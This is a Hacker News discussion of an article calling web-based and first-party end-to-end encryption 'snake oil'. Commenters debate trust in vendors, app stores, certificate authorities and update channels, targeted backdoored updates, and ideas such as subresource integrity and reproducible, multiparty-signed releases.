NHacker Next
login
▲Web-based cryptography is snake oildevever.net
111 points by hlandau 782 days ago | 102 comments
Loading comments...
p-e-w 782 days ago [-]
Not again. We had this same bad argument just last week[1].

Custom-engineering backdoored client software, and rolling it out to a subset of users in a targeted attack, is not comparable to storing everything in plaintext on the server and looking through it whenever the fancy strikes. Practicality matters a great deal in information security.

Yes, it is perfectly possible to do the former – just like it is possible to enter any home and simply bug all hardware inside. That doesn't mean this scenario should be part of a normal person's threat model.

The article is correct in the sense that technically, web-based cryptography requires a degree of trust in the server provider. But the article is utterly wrong in concluding that this makes it snake oil, because attacks are substantially more difficult and costly.

[1] https://news.ycombinator.com/item?id=36386884

samwillis 782 days ago [-]
Exactly, with all cryptographic software you are trusting the distribution and update provider, along with your OS. There is always a level of trust.

With an app from an App Store you are trusting at a minimum:

- the vendor

- the App Store

- the update system for your OS

For a web app (via SSL) you are trusting:

- the vendor

- the browser and it's update system

- the OS and its update system

There is barely a difference in a world of auto updating software.

kpdemetriou 782 days ago [-]
The web app case is unfortunately more hazardous:

- You're also trusting a large population of Certificate Authorities (CAs), subject to the post-compromise implications of Certificate Transparency. Only one needs to be compromised.

- An app "update" occurs on every page load, giving attackers flexibility and more frequent opportunity to intercept app payloads - perhaps as users cross into networks the attackers control.

- There are currently no sufficient mechanisms to validate the integrity of web app packages end-to-end. Not even under a trust-on-first-use (TOFU) model.

These are all practical constraints we're grappling with while working on Backbone[1], and why deploying native apps is a top priority for us. Nevertheless, we need to reach users where they are, and that means we can't completely deprecate our web app.

[1] https://backbone.dev/

CJefferson 782 days ago [-]
Once a CA gives out one bad certificate, they are done. If your risk profile includes someone being willing to throw away an entire CA to get to you, then you should worry about it. For 99.999% of people and companies, I don’t imagine that is a reasonable concern.
est31 781 days ago [-]
CAs give out bad certificates all the time. Whether they are done depends on the reason. Often people give fradulent information to CAs, which leads to them issuing a certificate. This is usually discovered soon after the fradulent issuance, but for some victims it might still be too late. If the CA proves that it followed due diligence, and this happens rarely enough, they won't be distrusted by browsers.
littlestymaar 782 days ago [-]
> - You're also trusting a large population of Certificate Authorities (CAs), subject to the post-compromise implications of Certificate Transparency. Only one needs to be compromised.

I fail to see the difference between Web and Native in that regards, in both case the attacker need to both:

- a compromised certificate

- a way to redirect the user to their own server (be it DNS or IP spoofing, or something more fancy like bitsquatting).

With only one of those, both the Web and Native app are safe, and with the two of them, you're screwed in both cases.

> - There are currently no sufficient mechanisms to validate the integrity of web app packages end-to-end. Not even under a trust-on-first-use (TOFU) model.

Would you mind expanding your requirements here? (Especially, what's the threat model you have in mind for which subresource integrity isn't enough but your ideal solution would be).

afiori 782 days ago [-]
I suspect they want a browser feature to show fingerprints of the HTML and of subresources possibly to pin a certificate for a given domain.

A browser setting to only load subresources with integrity checks would also help

littlestymaar 781 days ago [-]
> I suspect they want a browser feature to show fingerprints of the HTML and of subresources possibly to pin a certificate for a given domain.

You can do pretty much all you want in a ServiceWorker today[1], but I'll advise against pinning certificates, because you'd just be re-marking HPKP again, with the same gigantic footgun.

> A browser setting to only load subresources with integrity checks would also help

A “browser setting”? What's the point if the user need to set it up themselves to be secure? Some kind of linting tool on CI in order to be sure you never include a resource without SRI would be nice though, but it's not really the responsibility of the browser here.

[1]: you can see an example of that here: https://arxiv.org/pdf/2105.05551.pdf (Note that I've just DuckduckGo-ed a quick example, I haven't read this particular paper and can't say if their scheme is particularly good, but that'd give you an idea).

est31 781 days ago [-]
The difference is, with the App Store there is policies against malware. Furthermore, it's harder to hide such an attack as you can't press a button to deploy a special version of the client just to Joe Doe whose private pictures you are interested in. You either have to deploy it to a large group, or not at all. With js, you have full control over the HTTP server and can give that specific person a specific version of the client.

Yes, the updates are automated on mobile devices, but not under total and full control of the app developer, unlike for websites.

And people do monitor what e.g. the Signal app is doing, or WhatsApp.

I don't agree though that all web-based cryptography is snake oil though. Targeted attacks from the site operator are not the only thing you want to defend from. Say the site operator is asked by authorities to hand over data they store of a specific user. Then the insecure web based cryptography is enough to protect the data: everything that's stored is encrypted.

SheinhardtWigCo 782 days ago [-]
I somewhat share this fatalist view, but it's still worth iterating on all of this until it's possible for the trusted party to be the user's chosen auditor instead of the vendor.

Unfortunately, the vendors have little reason to facilitate that.

goodpoint 782 days ago [-]
If you use a security-oriented Linux distribution there will be a ton of difference.
anonym29 782 days ago [-]
This line of thinking is analogous to handing competent threat actors a skeleton key to your system with only one condition - the attack must not be trivial - and then you'll grant them full access.

These kinds of attacks can be made trivial with the engineering capability, capacity, and systems employed by large tech firms like Google, Apple, Facebook, et al. even in the context of these firms as third party platform providers, to say nothing of their own first-party software.

These systems can already classify your political views with a high degree of accuracy, and platforms like the iTunes / Apple App Store and Google Play are already designed with the capability to serve different versions of applications to different requestors (think beta programs), in addition to being the signing entity, for package formats that are entirely within their capability to supplement with additional code.

To be clear - it's entirely plausible that one day, the rogue, evil, mean government voted into power by the evil bad party of your choice could compel Apple, or Google, to backdoor all applications going to clients with the same known political views as yours.

You believe this to be too complex or unrealistic to be plausible (Occam's Razor, right?) but in doing so (and lowering your guard to such threat), YOU are the one that makes this go from impossible to possible.

Also, using normative adjectives like "'normal people' shouldn't worry about this in this in their threat model" implies that those who do have competent threat actors after them aren't "normal", but we know that to be untrue - competent threat actors are, to some degree or another, after everyone. There is no need to "otherize" people for simply being aware of this.

Instead of proscribing behavior, consider that maybe individuals are better equipped to understand their own threat models than you are, and explain the pros and cons of various courses of actions, rather than implying everyone who isn't a sheep isn't normal, and everyone who is a sheep doesn't have real threat actors interested in them.

phh 782 days ago [-]
I agree it isn't snake oil, but from my PoV it's barely moving the scale back from the "use an E2E IM to protect against tour state", while either recommending closed source apps or close source origins (downloading an open source app from Google Play Store or App Store who owns the encryption keys is pretty much the same security as close source app)
badrabbit 782 days ago [-]
I have to disagree with you, the ability for threat actors and LE to selectively backdoor code on server is important in any TM.

Practicality is dynamic, TAs use the easiest method within the parameters of their objectives. It is reasonable to assume this attack would be the easiest given lack of other options.

By your logic,56 bit DES is fine because most people won't see attackers that spend >$20k to crack their keys. Just like they won't see robbers who spend that much to break into their homes.

Infosec is different than IRL because TAs can attack arbitrary targets easily with little personal risk. Also, hard attacks today can become common attacks a year from now and security for even the 99th percentile of users who get targeted attacks is important.

fragmede 782 days ago [-]
A jilted jealous former lover dropping a hardware bug in someone's home doesn't really seem that far fetched, but maybe I've been watching too many TV shows. Something off Amazon for < $100 can record audio for hundreds of hours to a microSD card, and it's only active when there's noise.
chromakode 782 days ago [-]
While I agree with this premise, taking an extreme view, practically all software which users routinely update are vulnerable to the first party / author being compelled to ship a harmful release.

The lack of a distribution trust model for the web has long bummed me out, but even snake oil E2EE is a good thing because it makes an active (and potentially detectable) intervention necessary to exploit a client.

Supply chain attacks remain a huge mess. Unless you can validate the worthiness and authenticity of an update, or sandbox it sufficiently, most software can become a threat.

A more manual, opt-in update process for web apps (via service workers) would be a nice innovation, but I doubt it would provide much more safety to non technical end users, since the harder question is whether a particular update is harmful. Solving that verification problem is the crux of the issue regardless of how rapidly software updates.

croes 782 days ago [-]
One step further, every software you didn't compile yourself and checked the source could have a secret trigger to do harm.

And you need to trust the compiler.

bhawks 782 days ago [-]
You trust that CPU doing the build? Have you heard about the mess Intel Management Engine is?

Unless you build from the transistors up you have incoherent security theater.

BasedAnon 782 days ago [-]
Here's a tutorial if you want to actually do this, although it's worth pointing out that quality is heavily dependent on how much you're willing to shell out for equipment: https://www.youtube.com/watch?v=s1MCi7FliVY
rootw0rm 782 days ago [-]
hold on, which universe did you source your matter from?
wolletd 782 days ago [-]
https://www.teamten.com/lawrence/writings/coding-machines/
duck2 782 days ago [-]
Nothing old silicon and analog peripherals can't solve.
Koffiepoeder 782 days ago [-]
Indeed, in the end it all comes down to trust. One of my favourite HN comments of all time is this one:

https://news.ycombinator.com/item?id=33899478

If you want to be 'really' secure, you can trust noone. No silicon, no software, no compilers, no certificates, no power grids, no networks, no friends, no coworkers, no nothing.

But that is no life I'd want to live. So I pick my battles and make sure my SecOps is better than 99.9% of the people out there. For me that suffices. YMMV.

EGreg 782 days ago [-]
https://www.cs.cmu.edu/~rdriley/487/papers/Thompson_1984_Ref...
NoZebra120vClip 782 days ago [-]
Currently, following the latest updates are a Sophie's choice. Because if your software is a month old, it may have one or two known vulnerabilities, which may or may not be disclosed, may or may not have a POC, and may or may not be actively exploited in the wild. But if you download and install the latest update, then you may receive mitigations for known exploits, but now you very likely have an unknown number of new zero-day vulnerabilities.

So update decisions could have a calculus like, "it's already working; I don't need any feature updates; I'll stick with the stable version" and then attempting to evaluate each CVE on its merits vs. the mitigations offered in each update. (Of course, the way developers like KeePassXC are fighting with the NVD shows that CVE descriptions can't even be trusted these days.)

I foolishly disabled automatic updates for my consumer-grade WiFi router, and I didn't have a plan for manual updates, so it got pwned. I read a few CVEs and I'm fairly sure I know how it was pwned remotely. Thankfully it didn't seem to be making lateral moves into my computing devices, or acting against me personally, and I was able to disinfect the router and put it back into service. The vulnerabilities that enabled the pwnage were fixed by an update which was released about a month before the pwnage, so if I'd been on automatic updates, I probably would've been safe. And that's what the hackers count on.

predictabl3 782 days ago [-]
I'm sorry this makes absolutely no sense to me. It feels like a convoluted explanation for being stubborn about auto updates and then an example of precisely why they're useful.

I would take an unaudited patched-for-known-cves over just not updating any day.

goodpoint 782 days ago [-]
> Unless you can validate the worthiness and authenticity of an update

That's the job of traditional Linux distros.

> or sandbox it sufficiently

That does nothing when it comes to E2EE.

chromakode 782 days ago [-]
> That's the job of traditional Linux distros.

I share this view, but I also think it's very difficult to verify such validation is happening. I don't think most end users would want a distro stable enough to meet a high review bar.

> That does nothing when it comes to E2EE

Not all components need access to the keys or user data. Reducing attack surface reduces the amount that needs to be validated.

EGreg 782 days ago [-]
Now AI shows just how much malware is in our package managers: https://twitter.com/engageusersai/status/1672872723486310400...
upofadown 782 days ago [-]
If it works out that the first party has to ship a harmful release to everyone and they can only supply that release through a second party in source code form then we are way ahead of the case where there is only one party. A conspiracy involving multiple entities is much harder to get away with than a unilateral action.
skrebbel 782 days ago [-]
Seems the crux is in the auto-updating, right? So now we have security people telling us to always run the latest updates, to protect against 0-days, and security people telling us to not update, because that lets the service spy on us.

It does not seem to me that there is any middle ground, barring writing your own client, from scratch, against an open protocol.

EDIT: seems to me that web-based e2e encryption, as described here, still protects you from irresponsible employees of the service reading your messages. And database leaks etc. Getting an update that spies on customers shipped is not a trivial thing in most organisations.

kpdemetriou 782 days ago [-]
The impact of E2EE in the event of database compromises is a little under-rated because the conversation often centers around the maximalist targeted survaillenace threat model. Yet, many more individuals will be affected as a result of plain old data breaches.
NoZebra120vClip 782 days ago [-]
> always run the latest updates, to protect against 0-days

How does running the latest updates protect against 0-days? Wouldn't the latest updates be bundling the latest 0-days? The latest updates mitigate known vulnerabilities, not 0-days.

emersion 782 days ago [-]
Updating is fine as long as it's from a auditable repository with full source code history, and built by a third-party like a distro (or the build is reproducible).
skrebbel 782 days ago [-]
Who really reads the source code though?
msla 782 days ago [-]
The idea is that enough people do that if something bad happens, it makes the news, by which I mean Twitter/Mastodon/HN/LWN and so on.
EGreg 782 days ago [-]
By which time we get this:

https://qbix.com/blog

goodpoint 782 days ago [-]
A repository with history is not enough. It's easy to circumvent. You need software packages reviewed and signed by trusted parties - aka a traditional Linux distro.
sashank_1509 782 days ago [-]
This argument doesn’t make sense really. Let us say I send a message on WhatsApp and now the government wants to know what I sent.

The government using all its coercion forces WhatsApp to update everyone’s app with compromised code. If I simply refuse to download the update, it is impossible for the government to know what I sent?

Let us say I do download the update. I suppose something extremely crude like downloading all messages ever sent client side and just sending it to the server again needs to be done for the govt to access my message. Presumably you would know if such a breaking update was happening through the news and just refuse to update your software.

If the government forces WhatsApp to permanently use backdoored code in the future, then it’s no longer E2E encrypted.

Purportedly E2E provides some degree of protection against an authority of infinite coercion capability like the government. If we are talking about the government, they could just arrest you, torture you and get access to your messages client side if they want to. I think E2E encryption is even more helpful when it comes to protection against opportunistic actors like employees of the company offering the messaging service. I can be assured that no employee can ever sell my data, even if they were bribed, or any Man In The Middle attacks are also rendered pointless.

SheinhardtWigCo 782 days ago [-]
Hypothetically, a government can coerce Apple or Google to update just your WhatsApp in a manner that you can't realistically detect.

To make this more concrete: if Apple or Google has Australian citizens in positions with privileged access to software update infrastructure, the Australian government can issue a Technical Assistance Notice compelling them to cause a compromised variant of an app or OS component to be delivered to a targeted user, and binding them not to disclose the existence of the notice.

UncleMeat 782 days ago [-]
This is a very big hypothetical. The app stores don't have this precise of targeting, so they'd need to build entirely new distribution functionality in addition to the backdoored app.

Given that Google currently leaks like a freaking sieve and has a monorepo where everybody has access to almost all of the code, it is difficult to believe that this plan would go off without a hitch.

SheinhardtWigCo 782 days ago [-]
Certainly a large dose of cynicism is needed to even entertain the possibility. My own cynicism stems from the Snowden disclosures and other leaks.

I think there are more possibilities than you're considering. As far as I know, once a backdoored app is signed with the correct key, there's nothing stopping the partner CDN(s) from serving it to targeted users. In the simplest case, that's about 5 lines of nginx config.

Also, the ability to stratify OS updates already exists because there are many combinations of country + carrier + device model + user permissions (e.g. special rules allowing internal/external developers and carrier employees to install development builds).

UncleMeat 782 days ago [-]
> As far as I know, once a backdoored app is signed with the correct key, there's nothing stopping the partner CDN(s) from serving it to targeted users.

This is true for native software distributed by various linux distro maintainers too.

rdtsc 781 days ago [-]
> so they'd need to build entirely new distribution functionality in addition to the backdoored app.

In to order to do debugging or a slow rollout, I can see them implementing this in their backend. They’re can target updates at least by some combination of properties. Once that’s in place it might not be hard to throw a unique identifier in there as well.

sneak 782 days ago [-]
> The app stores don't have this precise of targeting

This is false. Apple's OS-level software update tools have had the ability to target specific hardware items (ie serial numbers, ethernet MAC addresses, etc) for well over a decade.

chrismorgan 782 days ago [-]
Minor correction: I believe your case would require a technical capability notice the first time it was done. Assistance notices are “help us with the tools you already have” and regular warrant stuff, whereas capability notices are “you must develop the capability to help us”, and come from the Attorney-General with approval from the Minister for Communications. (A good summary of what this stuff means: https://www.homeaffairs.gov.au/nat-security/files/assistance....)

But I also don’t think that this stuff would actually apply to Apple or Google. It’s part of the Telecommunications Act, for carriers and carriage service providers, which, while broad definitions, probably exclude them. Back when I worked at Fastmail (2017–2020), Fastmail as an email service provider was considered subject to that act for data request purposes, but the footnote at https://www.fastmail.com/blog/advocating-for-privacy-aabill-... indicates that in 2021 they were able to change to using the Crimes Act and such instead, so I’m not sure if they’re even subject to the Telecommunications Act in this way any more (not that the A&A Bill affected them anyway since they don’t do E2EE), and Apple and Google’s app stores feel like they would be even more out of scope. But I don’t know; there’s quite a bit of legislation I’ve paid close attention to, but the Telecommunications Act isn’t among that collection. And even if these app store companies aren’t covered by this stuff now, there are probably other governments out there that can already insist on this sort of thing, and plenty of future prospects, the A&A Bill showing how easily this sort of thing can be shoved through.

SheinhardtWigCo 782 days ago [-]
Thanks for the correction! That subtlety eluded me.

On whether the assistance measures apply: the Home Affairs FAQ you referenced says they apply to "companies, businesses, organisations or individuals who contribute to the communications supply chain in Australia... This definition captures telecommunications operators, providers of electronic services, developers of software and manufacturers of devices."

jdthedisciple 782 days ago [-]
Perfectly said.

And a second-order negative consequence of the type of argument this author is pursuing is that it makes the normal privacy aware folk look completely delusional and paranoid about reality.

The vast majority of people relying on E2EE will not be affected by any of the scenarios he is laying out.

And if they will, it will be the headline of the week (at least on Twitter & Co.) and people will switch. Simple as that.

mind-blight 782 days ago [-]
This seems poorly reasoned. The premise that there's a hard divide between trustworthy and untrustworthy systems is, at best, incomplete.

The authors definition would consider 1-password an incoherent system, yet it's exceptionally effective at mitigating a whole class of attacks. You could argue that any system where you don't control at least 1) the update mechanism, or 2 the keys isn't sufficiently secure. That's one valid approach, but I would recommend anyone who thinks this read Reflections on Trusting Trust: https://www.cs.cmu.edu/~rdriley/487/papers/Thompson_1984_Ref....

The more interesting and important problem isn't preventing all possible attacks. It's knowing what attack vectors are worth preventing, and what the consequences for a successful hack are. It's definitely not black and white

upofadown 782 days ago [-]
It is just the end to end encryption (or client side encryption in the case of 1-password) part that is snake oil. If you trust 1-password (or generally the entity that controls the software) then you can consider yourself secure.

The hard divide comes from the truth of who controls your software.

zzzeek 782 days ago [-]
> The problem is, of course, that “there's nothing we can do” isn't true. The service provider could develop and ship a backdoored version of the client software. The actual gambit the service provider is counting on here is a particular legal theory: “we could change the software so as to be able to process this warrant, but you can't make us do so”.

> You could perhaps call this cryptography theatre. The purpose of cryptography theatre is not to deliver actual security from a cryptographic perspective but act as a kind of magic spell which (the user believes) gives them a magic opt out from the obligations conferred by warrants and subpoenas. Thus, cryptography theatre must fundamentally be understood not as a cryptographic technology but as a legal one.

dude drinks too much coffee. Of course I wouldn't trust WhatsApp to not give away my conversations to the NSA. But if I'm using WhatsApp in a Starbucks on their wifi, some script idiot next to me can't read my conversations. Not like I use WhatsApp (or talk to people, really) but the security here is on a spectrum.

chrismorgan 782 days ago [-]
The subject here is end-to-end encryption (where content is encrypted all the way from one client device to another client device), which makes big promises of inviolability. But in order to avoid the Starbucks snooper, you only need transport encryption (where content is encrypted from your client device to the WhatsApp or whatever server, normally with TLS in the form of HTTPS).
zzzeek 782 days ago [-]
Yes, good clarification. Generally if you're looking for government-proof conversations, id never use a Facebook or Google product or anything like that at all. Seems like the best idea would be dedicated devices you prepare with your co-conspirators up front using only open source components that you've audited and certs you've set up yourselves.
tqwhite 782 days ago [-]
Also, the bad guys could kidnap your children and use them to force you to hand over your password.

The histrionic use of "snake oil" is silly. Only idiots think that secrets are safe under all conditions, viz, the above. The real world meaning of secure is to make it very (very, very) difficult for bad guys to get access to your stuff.

It is neither reasonable nor desirable to have some kind of perfect world where no mistakes can be made to help bad guys get caught. If this can be done with almost zero good guys being compromised, good enough.

Sanctimonious sneering about 'theater' when WhatsApp, Signal and iMessages make practical security available to the masses is, well, sanctimonious. Unpleasant, even.

SheinhardtWigCo 782 days ago [-]
1. The author is correct that the real purpose of E2EE, and the reason companies expend considerable R&D resources on it, is to have a plausible excuse not to produce records; and to protect against malicious insiders. That's it. You don't have real "end-to-end" encryption unless you or someone you really trust has thoroughly audited the hardware and software stack. Obviously, almost no-one has the resources to do that.

2. The author's argument also applies to the App Store distribution model. Apple or Google may choose or be compelled to publish an app or OS update that is only visible to certain users. By default, iOS and Android install app updates without user approval. (You can and should, of course, disable that if you're concerned about such things.) The key difference is that app developers can't mount targeted attacks in this manner; only Apple and Google can.

3. Here's a simpler iteration on the author's idea for applying subresource integrity to service workers: an "immutable" variant of the https scheme that requires the lowest level of the domain to match a hash of all resources loaded on the page. JS is only enabled if the hash matches.

https+immutable://mhzwdnyyv5turofr8kkivabqyvamg7yteeitzwrg64o00taouw.signal.org

As far as I can tell, this mitigates the issues outlined by the author, and has the following nice properties:

- You can bookmark the URL and be certain that the code can't change in future.

- You can share the URL with someone else and be certain that they will be served the same code.

- Not affected by client-side state (e.g. cache) and thus can't be abused for fingerprinting.

- No risk of bricking the app in perpetuity.

- Thanks to Certificate Transparency, the existence of any published update is public knowledge.

ryan-c 782 days ago [-]
> The author's argument also applies to the App Store distribution model.

This is explicitly called out.

SheinhardtWigCo 782 days ago [-]
Oops, good point, I missed that.
snowstormsun 782 days ago [-]
3. Nice idea! But how will that prevent any pinned script from loading new code by making some request to the server of Eve (simple get request, for example) and running it using something like `eval`. The problem is that the pinned scripts would need to be thoroughly audited, which is hard to do for non-open source compiled/minified Javascript.
SheinhardtWigCo 782 days ago [-]
True, but that problem applies to "native" apps as well.
kpdemetriou 782 days ago [-]
Regarding #3, you'll need to load the immutable URL, perhaps indirectly, from someplace that ultimately has a user-facing URL. If an attacker can modify content in transit, then they can modify the content under the user-facing URL to bypass this scheme.
SheinhardtWigCo 782 days ago [-]
The idea is that the immutable URL serves the entire app. Then if your threat model calls for it, you can bookmark the URL to "pin" that version of the app, or send the URL to someone else and be sure that they're getting served with the same code as you. Sort of like an onion URL.
Aachen 782 days ago [-]
Web based cryptography saved my ass, fifteen years ago when https wasn't even used for the site I logged into.

Then how can you trust what the server sends you at all?! Infinitely worse than the situation described in the article!

My attacker must have been someone on the school network. They deleted a lot of things (it was purely destructive) but I saw in access logs that they were stumped by the admin panel which asked for the password again. I had entered my password of course, but the login form had client-side hashing. They can take my session token, but my password was safe. I used the password in other places as well, I think even for my email because I wanted both to be secure and it was a good password (my logic as a 16-year-old), but it was never compromised.

I did change it in case they could brute force the hash at some point (small chance), but client side hashing saved my ass from passive observers. Later, I was a passive observer myself with airmon-ng, exploring public WiFis (no malicious intent, though). Writing and injecting custom data into the traffic was beyond my skill level, as it seemed to have been for those schoolmates.

TLS makes a lot of things better, but on the need-to-know principle, I still feel like client-side password hashing has merit. The server never needs to know your password, it just needs to do a quick single round with secret pepper to disallow a pass the hash attack.

chrismorgan 782 days ago [-]
I’ve taken to using the phrasing “first-party end-to-end encryption is snake oil”, which I feel is also incidentally a slightly more accurate take on the content of the article than the article’s own title, though both are generally true, drawing on different aspects, and both lack a little nuance.

(I first used that specific phrasing a bit over a year ago, judging by HN search.)

A large part of why I call it snake oil is that it’s generally being sold as an inherent and unassailable virtue, when in actual fact it’s nowhere near as perfect as practitioners of it try to convince you (and most of their marketing claims are flat lies, though some do word things more precisely), and you make significant compromises in usability and functionality, which they don’t tell you about. From a convenience perspective, end-to-end encryption is simply dreadful and that’s all there is to it.

I wish we’d ended up with everyone hosting their own stuff instead, with completely decentralised infrastructure, which obviates extra end-to-end encryption (since transport plus storage encryption achieves just as much, and far more conveniently). But we haven’t, and there’s no realistic hope of ever ending up there with how we use tech now—it wouldn’t be particularly practical.

canes123456 782 days ago [-]
This comment is kind of baffling to me. I agree that first party end to end encryption is not a silver bullet and it is over sold. But in use cases where it makes sense, like messaging, it is a virtue and absolutely is worth the connivence security trade offs.

Yes, the first party can secretly undermine the end to end encryption for a single customer without alerting the customer. However, this would be exceedingly hard to do for an attacker (insider or outside) compared to there being no end to end encryption. You would need to have the first party on board with this which would be very illegal unless directed by a government. So you might still be vulnerable to state level attacks, but the company might be able to resist it by pointing to end to end security vs encrypting it self. It still strictly better than no end to end security where the government will request everything that was ever sent.

What is most odd is that you say that end to end encryption is not worth the convenience trade of but you think everyone hosting their own stuff would be better? This would be a disaster for both convenience and security. There zero chance that 99% of users would be able to securely self host their data. Even for the 1% that can and will secure their data, their data is likely also hosted in the other 99%. You just need to exploit the other side of the conversation and you are still screwed.

chrismorgan 782 days ago [-]
You’re underestimating the costs of E2EE even in messaging. There are plenty more that cause trouble (e.g. lack of recoverability, no content-based spam filtering, various key sharing problems), but I’ll focus on one that’s probably the easiest cost to talk about: no server-side search. If you want useful search, you have to download the entire collection, and be bound by your client’s performance. (In theory you can just download/store/upload an index, but in practice I gather that isn’t workable and doesn’t help anything.) This is generally tolerable for something like iMessages which is designed to be used on one or a very few physical devices where it’s persistently stored, but is very impractical for things like web access and larger collections, things like email. By most people’s threat models, E2EE for email is a terrible idea.
WhatsName 782 days ago [-]
Like everything it comes down to trust. I fail to see how shipping Javascript to a browser schould be treated any different than code shipped to a phone or your desktop. Yes the frequency of updates is different, but other than that if you can't trust the entity that sends you the code that you run, you are out of luck.
piaste 782 days ago [-]
It's not the frequency of updates, it's the control. I can easily ignore an application update until any arbitrary standards I require are satisfied; whether those standards are "ok, 48 hours have passed with no security alerts" or "my company's professional auditors have reviewed all code changes" is up to me.

(Unless there's a breaking change on the server side, but precisely because app updates are not guaranteed, app backends are much more conservative than web backends).

Controlling the updates for a web client might not be totally impossible but it's far, far more difficult and clumsy. Best case is it's a full SPA so you can just save the resources locally, but it's using classic server-side rendering with just a single chunk of client-side JS used for encryption... And of course there are no clearly announced and numbered releases, you need to keep refreshing the page to know when an update is deployed.

MattPalmer1086 782 days ago [-]
It's much easier to update or hack a web site than it is to distribute a new signed version of your code via app stores.

On your web site, you could easily serve up different pages to different users. I think you'd have to distribute compromised copies of your app to everyone with an app store?

Or is there any evidence that app stores can deliver different versions for specific users?

FabHK 782 days ago [-]
And the article says as much:

> It is worth noting that this law also applies to non-web applications where the service provider supposedly being secured against is also the client software distributor; thus, the “end-to-end encryption” offered by Whatsapp and Signal, amongst other proprietary services, is equally bogus.

jdthedisciple 782 days ago [-]
One fault of this argument lies in the assertion that every E2EE auto-updates.

IOW, if you decide to stick w one version that is shown to be without a doubt E2EE then certainly you are better off than with just TLS.

Furthermore, this article only focusses on in-transit encryption (TLS). What about encryption at rest? It can perfectly be viable to have an E2EE service provider keep my data stored in zero-knowledge fashion.

Lastly, typically an E2EE service provider's reputation and business rests on keeping their word. There is not a whole lot of incentive to break it, given the jurisdiction they reside in allows them to refuse compliance w secret services.

IMO this is fear-mongering. At the very least equating even this supposed "snake oil" E2EE with mere TLS seems out of touch w reality.

I wonder if the auther himself personally too avoids E2EE messaging services.

anticristi 782 days ago [-]
Related snake oils:

- Customer-Managed Encryption Keys -- US cloud providers love to market this

- Confidential Commuting -- where the root of trust is either the same company (AWS) or a US processor manufacturer (Azure, Google).

MattPalmer1086 782 days ago [-]
I think customer managed keys are often misunderstood. They aren't innately more secure than cloud provider managed keys from the cloud provider. They just give the customer the ability to manage the key lifecycle. Key generation, rotation, revocation. This is still a useful capability.
anticristi 782 days ago [-]
Indeed. I'm unsure whether this misunderstanding is "nurtured" or is simply "wishful thinking". Unfortunately, I heard too often CMEK being seen as "the holy grail" of processing data safely on untrusted cloud providers.
MattPalmer1086 782 days ago [-]
Yes, I encounter that attitude too quite frequently.

If you need to manage the keys in to particular schedules or policies, it's obviously what you want. That might be more secure in some ways than leaving it to the cloud provider, depending on what you actually do with the capability. But many people just stop at CMEK Is More Secure...

ketzu 782 days ago [-]
The updating part reminds me of the research of my friend: "WAIT: Protecting the Integrity of Web Applications with Binary-Equivalent Transparency" (https://arxiv.org/abs/2104.06136) where they attempted to get web projects closer to the integrity guarantees of a desktop application. It doesn't fix the issue completely, because updateability is an attack vector for desktop applications as well, but i remember it being pretty cool and a nice step in that direction.
upofadown 782 days ago [-]
The three prerequisites for E2EE:

1. All cryptographic keys controlled by the users.

2. Some way to confirm you are actually connected to who you think you are connected to.

3. A way to confirm that the code you are running is not leaking keys/content.

This rant covers a particular aspect of #3. E2EE is hard. It is too bad that the marketing is working overtime to convince us that it is not.

arianvanp 782 days ago [-]
E2EE not only protects the users against the company; it protects the company against the users. You can't leak data that you don't have. It makes compliance easier.
quickthrower2 782 days ago [-]
I think the same argument means any rpc type encryption is also insecure.

Even if the encryption itself is done using a 3rd party trusted library that is definitely kosher, the endpoint may have been compromised to leak whatever information to the public web.

Ergo there is no such thing as e2e encryption unless you have military level control over both ends of the pipe and the pipe itself.

bhawks 782 days ago [-]
The author has tunnel vision that the only actors in the room are users, service provider and the state. (And the service provider is colluding with users for some reason to stymie the state's power).

Service providers are made up of employees, contractors, interns and temps. Given a pile of easily searchable user information one of these individuals working for the service provider is going to start poking around that pile of information for reasons not aligned with providing the service. (Boredom, compromise, love interests, personal activism, etc).

End to end encryption terminated on the client puts a powerful boundary between the individual user and the individuals working for the service provider. It makes your private data strictly safer.

ssss11 782 days ago [-]
If the encryption happens client side (even in browser) then it’s fine, as long as you (only) can access the private key. How to prove that this is the case is a different question, is there a way other than open sourcing your code? I don’t think so
MattPalmer1086 782 days ago [-]
If your browser has access to your private key, and you are running code on someone else's web site to perform cryptographic operations, then it can simply exfiltrate your private key.
ryan-c 782 days ago [-]
the WebCrypto API has an exportable: false option, though the fact that there's no way to serialize a non-exportable key limits the usefulness of this.
ryan-c 782 days ago [-]
> There are at least two such cases

The first was Hushmail.

https://www.wired.com/2007/11/encrypted-e-mai/

littlestymaar 782 days ago [-]
To convince yourself that this is a very poor argument, you just need to replace E2E encryption in the post with “password hashing”: “What's the point of hashing the password if an attacker can just catch the password when the user logs in, or change the server code in order to disable hashing altogether”.

The things is that “attackers gaining read access on a database” is (unfortunately) a much more common threat than “attacker can execute arbitrary code on the server instead of the application for a long time”.

GTP 782 days ago [-]
But if the fundamental issue is that the JS code that runs in your browser is provided by the same entity providing the back-end, couldn't we have a different entity that -on a different domain- serves JS code that interacts with the backend of the original service? I know this is not the case now, but this is theoretically a possibility, right?
ryan-c 782 days ago [-]
I would argue that the "distributed by the same entity which it purports to secure against" is a less relevant distinction than this makes it out to be.

Consider, for example, Signal's progenitor, TextSecure, or E2EE for RCS.

What's stopping a government from compelling these services to ship backdoored code and then compelling the telco to spill the now-vulnerable ciphertext — which doesn't also stop them from doing the same to modern Signal?

I would also argue that the FBI/Apple example is exactly that scenario — the code being distributed by a different entity (Apple) from which it purports to secure against (any party with physical access).

hlandau 782 days ago [-]
Author here. I think the problem is the notion of services shipping code. If you get the endpoint software from a different entity to the communications provider, that's the first step to fixing this. XMPP+OMEMO etc. would be examples of this kind of arrangement, whereas Whatsapp/Signal actually ban the use of third party clients.

Once you have this, this means there now two nodes which need to be coerced to compromise the system - endpoint software provider and communications provider. Well, actually, just one - the endpoint software could just be changed to use a different, compromised communications provider (I think you were envisaging some more subtle compromise of ciphertext above).

This can be fixed, however. A lot of the work Linux distros have done around reproducible builds, and the new focus on release transparency, is informative here. You could absolutely have a FOSS project with a release process that requires multiparty signatures of releases with the release signers in different jurisdictions, and requiring proof of logging to a release transparency log, etc.

I suspect a lot of pushback on this is because the implications are significant, Emperor's New Clothes and all, but fixing this sort of thing is the first step to solving the problem. Pretty much the entire internet community was in a mindset of "but government wouldn't ever do..." complacency before Snowden, despite increasingly blatant warning signs, before people were forced to accept that reality. (The reason is simple; it's a funny thing about humans, when they realise some fact X being true would be very materially inconvenient to them, their first reaction is to argue that X isn't true, as though reality is negotiable...) Having an accurate view of just how impaired our security model is in this area is the first step to making things better IMO.

ryan-c 782 days ago [-]
I think, to a large extent, this is a question of threat models.

